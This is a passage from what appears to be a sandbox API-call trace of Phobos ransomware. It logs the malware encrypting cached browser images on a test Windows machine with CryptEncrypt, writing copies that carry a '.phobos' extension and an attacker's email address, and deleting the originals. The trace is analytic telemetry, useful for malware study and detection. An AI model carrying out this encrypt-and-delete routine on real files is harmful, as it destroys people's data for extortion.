dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.410] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9146) returned 1 [0178.410] CloseHandle (hObject=0x17c) returned 1 [0178.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0xlt[1].jpg")) returned 0x2020 [0178.410] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0xlt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0xlt[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.410] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.410] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.410] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0xlt[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.411] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0178.411] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.411] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x23ba, lpOverlapped=0x0) returned 1 [0178.893] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x23c0, dwBufLen=0x23c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x23c0) returned 1 [0178.893] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x23c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x23c0, lpOverlapped=0x0) returned 1 [0178.894] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0178.894] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.894] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0178.894] CryptDestroyKey (hKey=0xa32c68) returned 1 [0178.894] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0178.894] CryptDestroyKey (hKey=0xa32d68) returned 1 [0178.894] CloseHandle (hObject=0x17c) returned 1 [0178.895] CloseHandle (hObject=0x15c) returned 1 [0178.895] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0xlt[1].jpg")) returned 1 [0178.895] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0178.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe7d3b[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.896] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2333) returned 1 [0178.896] CloseHandle (hObject=0x15c) returned 1 [0178.896] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe7d3b[1].jpg")) returned 0x2020 [0178.897] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe7d3b[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe7d3b[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.897] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.897] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe7d3b[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.897] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0178.897] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.897] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x91d, lpOverlapped=0x0) returned 1 [0178.945] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x920, dwBufLen=0x920 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x920) returned 1 [0178.945] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x920, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x920, lpOverlapped=0x0) returned 1 [0178.946] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0178.946] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.946] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0178.946] CryptDestroyKey (hKey=0xa32c68) returned 1 [0178.946] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0178.946] CryptDestroyKey (hKey=0xa32d68) returned 1 [0178.946] CloseHandle (hObject=0x15c) returned 1 [0178.946] CloseHandle (hObject=0x17c) returned 1 [0178.946] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe7d3b[1].jpg")) returned 1 [0178.947] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0178.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe85ld[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.947] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=10320) returned 1 [0178.948] CloseHandle (hObject=0x17c) returned 1 [0178.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe85ld[1].jpg")) returned 0x2020 [0178.948] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe85ld[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe85ld[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.948] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.948] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.948] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe85ld[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.948] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0178.948] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.948] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x2850, lpOverlapped=0x0) returned 1 [0178.951] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2860, dwBufLen=0x2860 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x2860) returned 1 [0178.951] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x2860, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x2860, lpOverlapped=0x0) returned 1 [0178.952] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c68) returned 1 [0178.952] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.952] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0178.952] CryptDestroyKey (hKey=0xa32c68) returned 1 [0178.952] WriteFile (in: hFile=0x15c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0178.952] CryptDestroyKey (hKey=0xa32d68) returned 1 [0178.952] CloseHandle (hObject=0x17c) returned 1 [0178.952] CloseHandle (hObject=0x15c) returned 1 [0178.952] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe85ld[1].jpg")) returned 1 [0178.953] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0178.953] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedckp[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.954] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=5834) returned 1 [0178.954] CloseHandle (hObject=0x15c) returned 1 [0178.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedckp[1].jpg")) returned 0x2020 [0178.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedckp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedckp[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0178.960] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.960] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0178.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedckp[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0178.960] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0178.960] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0178.960] ReadFile (in: hFile=0x15c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16ca, lpOverlapped=0x0) returned 1 [0179.221] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16d0, dwBufLen=0x16d0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16d0) returned 1 [0179.221] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16d0, lpOverlapped=0x0) returned 1 [0179.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ae8) returned 1 [0179.222] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.222] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0179.222] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0179.222] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0179.222] CryptDestroyKey (hKey=0xa32d68) returned 1 [0179.222] CloseHandle (hObject=0x15c) returned 1 [0179.222] CloseHandle (hObject=0x17c) returned 1 [0179.222] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedckp[1].jpg")) returned 1 [0179.223] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0179.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee6ew[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.224] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=2729) returned 1 [0179.224] CloseHandle (hObject=0x17c) returned 1 [0179.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee6ew[1].jpg")) returned 0x2020 [0179.224] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee6ew[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0179.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee6ew[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0179.224] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.224] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0179.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee6ew[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0179.225] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32d68) returned 1 [0179.225] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0179.225] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xaa9, lpOverlapped=0x0) returned 1 [0179.250] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xab0, dwBufLen=0xab0 | out: pbData=0x3190020*, 